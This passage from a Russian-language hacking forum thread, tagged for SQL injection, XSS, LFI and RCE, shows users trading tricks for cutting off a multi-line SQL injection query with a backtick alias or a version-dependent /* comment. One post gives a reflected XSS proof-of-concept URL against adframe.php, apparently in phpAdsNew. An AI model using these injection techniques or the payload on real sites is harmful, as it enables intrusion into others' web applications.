Старый 26.07.2012, 12:13   #11
Boolean
 
Регистрация: 19.10.2011
Сообщений: 111
Репутация: 34
По умолчанию

Цитата:
Сообщение от yusmat Посмотреть сообщение
в том то и дело что коментировать бесполезно так как запрос многострочный то есть содержит enter
отрезаеться только то что идет в первой строке остальное дает sql error
Используй алиас (`) вместо многострочного комментария.
__________________
|
Boolean вне форума   Ответить с цитированием
Старый 26.07.2012, 12:39   #12
Beched
 
Регистрация: 06.07.2010
Сообщений: 395
Репутация: 118
По умолчанию

Цитата:
Сообщение от Boolean Посмотреть сообщение
Используй алиас (`) вместо многострочного комментария.

Так там дальше тоже они используются, не прокатит.

Если версия старше 5.забылкакой, то прокатит /*
Beched вне форума   Ответить с цитированием
Старый 17.08.2012, 21:02   #13
get
 
Регистрация: 10.08.2012
Сообщений: 4
Репутация: 1
По умолчанию

XSS (Версия не определена, но, предположительно, ветки phpAdsNew)
PoC:
Код:
/adframe.php?n=a4f592af&clientid=2'><script>alert(/asd/)</script>
get вне форума   Ответить с цитированием
Ответ

Метки
auth bypass, lfi, rce, sql-inj, xss

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot